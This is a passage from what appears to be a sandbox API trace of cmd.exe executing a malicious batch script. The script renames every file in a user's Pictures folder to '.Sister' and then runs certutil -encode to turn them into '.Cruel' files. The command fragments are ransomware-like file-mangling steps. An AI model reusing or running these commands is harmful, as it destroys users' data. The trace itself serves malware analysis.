(HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d57fa0) returned 1 [0294.176] GetProcessHeap () returned 0x21ed8c70000 [0294.176] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d675b0) returned 1 [0294.176] GetProcessHeap () returned 0x21ed8c70000 [0294.176] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937b930) returned 1 [0294.208] _get_osfhandle (_FileHandle=3) returned 0x98 [0294.208] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2bd [0294.209] ReadFile (in: hFile=0x98, lpBuffer=0x7ff66c5c9970, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xa6cf4fe970, lpOverlapped=0x0 | out: lpBuffer=0x7ff66c5c9970*, lpNumberOfBytesRead=0xa6cf4fe970*=0x240, lpOverlapped=0x0) returned 1 [0294.209] SetFilePointer (in: hFile=0x98, lDistanceToMove=703, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2bf [0294.209] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff66c5c9970, cbMultiByte=2, lpWideCharStr=0x7ff66c5d3c30, cchWideChar=8191 | out: lpWideCharStr="\r\nr %%a in (*) do ren \"%%a\" \"%%~a.Sister\"&for %%a in (%0) do ren \"%%~a.Sister\" \"%%~na.bat\"\r\n") returned 2 [0294.209] _get_osfhandle (_FileHandle=3) returned 0x98 [0294.209] GetFileType (hFile=0x98) returned 0x1 [0294.209] _get_osfhandle (_FileHandle=3) returned 0x98 [0294.209] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2bf [0294.209] GetProcessHeap () returned 0x21ed8c70000 [0294.209] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9379db0 [0294.210] GetProcessHeap () returned 0x21ed8c70000 [0294.210] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9379db0) returned 1 [0294.210] _tell (_FileHandle=3) returned 703 [0294.210] _close (_FileHandle=3) returned 0 [0294.211] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp\\ACA2.tmp\\ACA3.bat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\ac92.tmp\\aca2.tmp\\aca3.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xa6cf4fe9b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x98 [0294.211] _open_osfhandle (_OSFileHandle=0x98, _Flags=8) returned 3 [0294.212] _get_osfhandle (_FileHandle=3) returned 0x98 [0294.212] SetFilePointer (in: hFile=0x98, lDistanceToMove=703, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2bf [0294.212] _get_osfhandle (_FileHandle=3) returned 0x98 [0294.212] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2bf [0294.212] ReadFile (in: hFile=0x98, lpBuffer=0x7ff66c5c9970, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xa6cf4fe970, lpOverlapped=0x0 | out: lpBuffer=0x7ff66c5c9970*, lpNumberOfBytesRead=0xa6cf4fe970*=0x23e, lpOverlapped=0x0) returned 1 [0294.212] SetFilePointer (in: hFile=0x98, lDistanceToMove=767, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2ff [0294.212] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff66c5c9970, cbMultiByte=64, lpWideCharStr=0x7ff66c5d3c30, cchWideChar=8191 | out: lpWideCharStr="for %%a in (*.Sister) do certutil -encode \"%%~a\" \"%%~na.Cruel\"\r\n \"%%~a.Sister\" \"%%~na.bat\"\r\n") returned 64 [0294.212] _get_osfhandle (_FileHandle=3) returned 0x98 [0294.212] GetFileType (hFile=0x98) returned 0x1 [0294.212] _get_osfhandle (_FileHandle=3) returned 0x98 [0294.212] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2ff [0294.212] GetProcessHeap () returned 0x21ed8c70000 [0294.212] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9379db0 [0294.212] GetProcessHeap () returned 0x21ed8c70000 [0294.212] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9379db0) returned 1 [0294.213] _wcsicmp (_String1="for", _String2=")") returned 61 [0294.213] _wcsicmp (_String1="FOR", _String2="for") returned 0 [0294.213] _wcsicmp (_String1="FOR/?", _String2="for") returned 47 [0294.213] GetProcessHeap () returned 0x21ed8c70000 [0294.213] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb0) returned 0x21ed8c967c0 [0294.213] GetProcessHeap () returned 0x21ed8c70000 [0294.213] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4c) returned 0x21ed8c7cee0 [0294.213] GetProcessHeap () returned 0x21ed8c70000 [0294.213] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1c) returned 0x21ed8d45e30 [0294.213] GetProcessHeap () returned 0x21ed8c70000 [0294.213] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d45e30, Size=0x18) returned 0x21ed8c95540 [0294.213] GetProcessHeap () returned 0x21ed8c70000 [0294.213] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95540) returned 0x18 [0294.213] _wcsicmp (_String1="/L", _String2="%a") returned 10 [0294.213] _wcsicmp (_String1="/D", _String2="%a") returned 10 [0294.213] _wcsicmp (_String1="/F", _String2="%a") returned 10 [0294.213] _wcsicmp (_String1="/R", _String2="%a") returned 10 [0294.213] _wcsicmp (_String1="IN", _String2="in") returned 0 [0294.213] GetProcessHeap () returned 0x21ed8c70000 [0294.213] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x22) returned 0x21ed8d45e60 [0294.213] _wcsicmp (_String1="DO", _String2="do") returned 0 [0294.214] _wcsicmp (_String1="certutil", _String2=")") returned 58 [0294.214] _wcsicmp (_String1="FOR", _String2="certutil") returned 3 [0294.214] _wcsicmp (_String1="FOR/?", _String2="certutil") returned 3 [0294.214] _wcsicmp (_String1="IF", _String2="certutil") returned 6 [0294.214] _wcsicmp (_String1="IF/?", _String2="certutil") returned 6 [0294.214] _wcsicmp (_String1="REM", _String2="certutil") returned 15 [0294.214] _wcsicmp (_String1="REM/?", _String2="certutil") returned 15 [0294.214] GetProcessHeap () returned 0x21ed8c70000 [0294.214] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb0) returned 0x21ed8c96c40 [0294.214] GetProcessHeap () returned 0x21ed8c70000 [0294.214] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x22) returned 0x21ed8d45d40 [0294.214] GetProcessHeap () returned 0x21ed8c70000 [0294.214] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x48) returned 0x21ed8c7bf30 [0294.214] _tell (_FileHandle=3) returned 767 [0294.214] _close (_FileHandle=3) returned 0 [0294.215] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe748 | out: _Buffer="\r\n") returned 2 [0294.215] _get_osfhandle (_FileHandle=1) returned 0x50 [0294.215] GetFileType (hFile=0x50) returned 0x2 [0294.215] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0294.215] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe6d8 | out: lpMode=0xa6cf4fe6d8) returned 1 [0294.215] _get_osfhandle (_FileHandle=1) returned 0x50 [0294.215] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe718, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe718*=0x2) returned 1 [0294.222] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures") returned 0x18 [0294.222] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe758 | out: _Buffer="C:\\Users\\FD1HVy\\Pictures") returned 24 [0294.222] _vsnwprintf (in: _Buffer=0x21ed8e80190, _BufferCount=0x83cd, _Format="%c", _ArgList=0xa6cf4fe758 | out: _Buffer=">") returned 1 [0294.222] _get_osfhandle (_FileHandle=1) returned 0x50 [0294.222] GetFileType (hFile=0x50) returned 0x2 [0294.222] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0294.222] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe708 | out: lpMode=0xa6cf4fe708) returned 1 [0294.222] _get_osfhandle (_FileHandle=1) returned 0x50 [0294.222] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0xa6cf4fe748, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe748*=0x19) returned 1 [0294.223] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fea18 | out: _Buffer="for") returned 3 [0294.223] _get_osfhandle (_FileHandle=1) returned 0x50 [0294.223] GetFileType (hFile=0x50) returned 0x2 [0294.223] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0294.223] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe9a8 | out: lpMode=0xa6cf4fe9a8) returned 1 [0294.223] _get_osfhandle (_FileHandle=1) returned 0x50 [0294.223] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe9e8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe9e8*=0x3) returned 1 [0294.224] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fea18 | out: _Buffer=" %a in ") returned 7 [0294.224] _get_osfhandle (_FileHandle=1) returned 0x50 [0294.224] GetFileType (hFile=0x50) returned 0x2 [0294.224] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0294.224] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe9a8 | out: lpMode=0xa6cf4fe9a8) returned 1 [0294.225] _get_osfhandle (_FileHandle=1) returned 0x50 [0294.225] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe9e8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe9e8*=0x7) returned 1 [0294.225] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fea18 | out: _Buffer="(*.Sister) do ") returned 14 [0294.225] _get_osfhandle (_FileHandle=1) returned 0x50 [0294.225] GetFileType (hFile=0x50) returned 0x2 [0294.225] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0294.225] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe9a8 | out: lpMode=0xa6cf4fe9a8) returned 1 [0294.227] _get_osfhandle (_FileHandle=1) returned 0x50 [0294.227] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0xe, lpNumberOfCharsWritten=0xa6cf4fe9e8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe9e8*=0xe) returned 1 [0294.228] _get_osfhandle (_FileHandle=1) returned 0x50 [0294.228] GetFileType (hFile=0x50) returned 0x2 [0294.228] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0294.228] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe9d8 | out: lpMode=0xa6cf4fe9d8) returned 1 [0294.229] _get_osfhandle (_FileHandle=1) returned 0x50 [0294.229] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d45d50*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0xa6cf4fea18, lpReserved=0x0 | out: lpBuffer=0x21ed8d45d50*, lpNumberOfCharsWritten=0xa6cf4fea18*=0x8) returned 1 [0294.229] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fea18 | out: _Buffer=" -encode \"%~a\" \"%~na.Cruel\" ") returned 28 [0294.229] _get_osfhandle (_FileHandle=1) returned 0x50 [0294.229] GetFileType (hFile=0x50) returned 0x2 [0294.230] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0294.230] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe9a8 | out: lpMode=0xa6cf4fe9a8) returned 1 [0294.230] _get_osfhandle (_FileHandle=1) returned 0x50 [0294.230] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x1c, lpNumberOfCharsWritten=0xa6cf4fe9e8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe9e8*=0x1c) returned 1 [0294.231] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fea48 | out: _Buffer="\r\n") returned 2 [0294.231] _get_osfhandle (_FileHandle=1) returned 0x50 [0294.231] GetFileType (hFile=0x50) returned 0x2 [0294.231] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0294.231] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe9d8 | out: lpMode=0xa6cf4fe9d8) returned 1 [0294.231] _get_osfhandle (_FileHandle=1) returned 0x50 [0294.231] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fea18, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fea18*=0x2) returned 1 [0294.238] malloc (_Size=0xffce) returned 0x21ed8e90940 [0294.238] ??_V@YAXPEAX@Z () returned 0x21ed8e90940 [0294.238] GetProcessHeap () returned 0x21ed8c70000 [0294.238] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8c7cb80 [0294.239] GetProcessHeap () returned 0x21ed8c70000 [0294.239] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x14) returned 0x21ed8c959e0 [0294.239] GetProcessHeap () returned 0x21ed8c70000 [0294.239] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x18) returned 0x21ed8c95760 [0294.239] GetProcessHeap () returned 0x21ed8c70000 [0294.239] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x34) returned 0x21ed8cc8890 [0294.239] GetProcessHeap () returned 0x21ed8c70000 [0294.239] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8cc8890, Size=0x24) returned 0x21ed8d45d70 [0294.239] GetProcessHeap () returned 0x21ed8c70000 [0294.239] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d45d70) returned 0x24 [0294.239] GetProcessHeap () returned 0x21ed8c70000 [0294.239] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x22) returned 0x21ed8d45d10 [0294.239] FindFirstFileExW (in: lpFileName="*.Sister", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fe640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fe640) returned 0x21ed8c7cbe0 [0294.240] GetProcessHeap () returned 0x21ed8c70000 [0294.240] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d312a0 [0294.240] _wcsicmp (_String1="*.Sister", _String2=".") returned -4 [0294.240] _wcsicmp (_String1="*.Sister", _String2="..") returned -4 [0294.240] GetFileAttributesW (lpFileName="*.Sister" (normalized: "c:\\users\\fd1hvy\\pictures\\*.sister")) returned 0xffffffff [0294.240] GetLastError () returned 0x7b [0294.240] GetProcessHeap () returned 0x21ed8c70000 [0294.240] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x22) returned 0x21ed8d45e00 [0294.240] GetProcessHeap () returned 0x21ed8c70000 [0294.240] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d45e00, Size=0x56) returned 0x21ed8c7cb20 [0294.240] GetProcessHeap () returned 0x21ed8c70000 [0294.240] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c7cb20) returned 0x56 [0294.240] GetProcessHeap () returned 0x21ed8c70000 [0294.240] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9379db0 [0294.240] GetProcessHeap () returned 0x21ed8c70000 [0294.240] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9379db0, Size=0x58) returned 0x21ed9379db0 [0294.241] GetProcessHeap () returned 0x21ed8c70000 [0294.241] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9379db0) returned 0x58 [0294.241] GetProcessHeap () returned 0x21ed8c70000 [0294.241] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9379e20 [0294.241] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0294.241] GetProcessHeap () returned 0x21ed8c70000 [0294.241] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x46) returned 0x21ed8c7c0c0 [0294.241] ??_V@YAXPEAX@Z () returned 0x1 [0294.241] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0294.241] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7cd00 [0294.241] FindClose (in: hFindFile=0x21ed8c7cd00 | out: hFindFile=0x21ed8c7cd00) returned 1 [0294.242] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7d000 [0294.242] FindClose (in: hFindFile=0x21ed8c7d000 | out: hFindFile=0x21ed8c7d000) returned 1 [0294.242] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd9e38998, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd9e38998, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 0x21ed8c7cd00 [0294.242] FindClose (in: hFindFile=0x21ed8c7cd00 | out: hFindFile=0x21ed8c7cd00) returned 1 [0294.242] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\4f lywQbc0ZJ_8b.gif.Sister", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x685ef6e0, ftCreationTime.dwHighDateTime=0x1d5eb76, ftLastAccessTime.dwLowDateTime=0x93013f0, ftLastAccessTime.dwHighDateTime=0x1d5e957, ftLastWriteTime.dwLowDateTime=0x93013f0, ftLastWriteTime.dwHighDateTime=0x1d5e957, nFileSizeHigh=0x0, nFileSizeLow=0x8743, dwReserved0=0x0, dwReserved1=0x0, cFileName="4f lywQbc0ZJ_8b.gif.Sister", cAlternateFileName="4FLYWQ~1.SIS")) returned 0x21ed8c7cca0 [0294.242] FindClose (in: hFindFile=0x21ed8c7cca0 | out: hFindFile=0x21ed8c7cca0) returned 1 [0294.243] _wcsnicmp (_String1="4FLYWQ~1.SIS", _String2="4f lywQbc0ZJ_8b.gif.Sister", _MaxCount=0x1a) returned 76 [0294.243] malloc (_Size=0x1ff9c) returned 0x21eda100000 [0294.243] ??_V@YAXPEAX@Z () returned 0x21eda100000 [0294.245] GetProcessHeap () returned 0x21ed8c70000 [0294.245] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x38) returned 0x21ed8cc8750 [0294.245] ??_V@YAXPEAX@Z () returned 0x1 [0294.245] ??_V@YAXPEAX@Z () returned 0x1 [0294.245] GetProcessHeap () returned 0x21ed8c70000 [0294.245] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9379e20, Size=0x220) returned 0x21ed9379e20 [0294.245] GetProcessHeap () returned 0x21ed8c70000 [0294.245] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9379e20) returned 0x220 [0294.245] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0294.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0294.245] GetFileType (hFile=0x50) returned 0x2 [0294.245] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0294.245] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0294.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0294.246] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0294.253] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures") returned 0x18 [0294.253] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Pictures") returned 24 [0294.253] _vsnwprintf (in: _Buffer=0x21ed8e80190, _BufferCount=0x83cd, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0294.253] _get_osfhandle (_FileHandle=1) returned 0x50 [0294.253] GetFileType (hFile=0x50) returned 0x2 [0294.253] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0294.253] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0294.254] _get_osfhandle (_FileHandle=1) returned 0x50 [0294.254] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x19) returned 1 [0294.255] _get_osfhandle (_FileHandle=1) returned 0x50 [0294.255] GetFileType (hFile=0x50) returned 0x2 [0294.255] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0294.255] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0294.255] _get_osfhandle (_FileHandle=1) returned 0x50 [0294.256] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed9379dc0*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x21ed9379dc0*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x8) returned 1 [0294.256] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe588 | out: _Buffer=" -encode \"4f lywQbc0ZJ_8b.gif.Sister\" \"4f lywQbc0ZJ_8b.gif.Cruel\" ") returned 66 [0294.256] _get_osfhandle (_FileHandle=1) returned 0x50 [0294.256] GetFileType (hFile=0x50) returned 0x2 [0294.256] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0294.256] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe518 | out: lpMode=0xa6cf4fe518) returned 1 [0294.257] _get_osfhandle (_FileHandle=1) returned 0x50 [0294.257] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x42, lpNumberOfCharsWritten=0xa6cf4fe558, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe558*=0x42) returned 1 [0294.257] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0294.257] _get_osfhandle (_FileHandle=1) returned 0x50 [0294.257] GetFileType (hFile=0x50) returned 0x2 [0294.257] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0294.257] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0294.258] _get_osfhandle (_FileHandle=1) returned 0x50 [0294.258] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0294.264] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe300, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0294.265] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0294.265] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0294.265] malloc (_Size=0xffce) returned 0x21eda100000 [0294.265] ??_V@YAXPEAX@Z () returned 0x21eda100000 [0294.265] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0294.265] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0294.265] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0294.265] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0294.265] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0294.265] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0294.265] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0294.265] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0294.265] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0294.266] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0294.266] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0294.266] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0294.266] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0294.266] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0294.266] 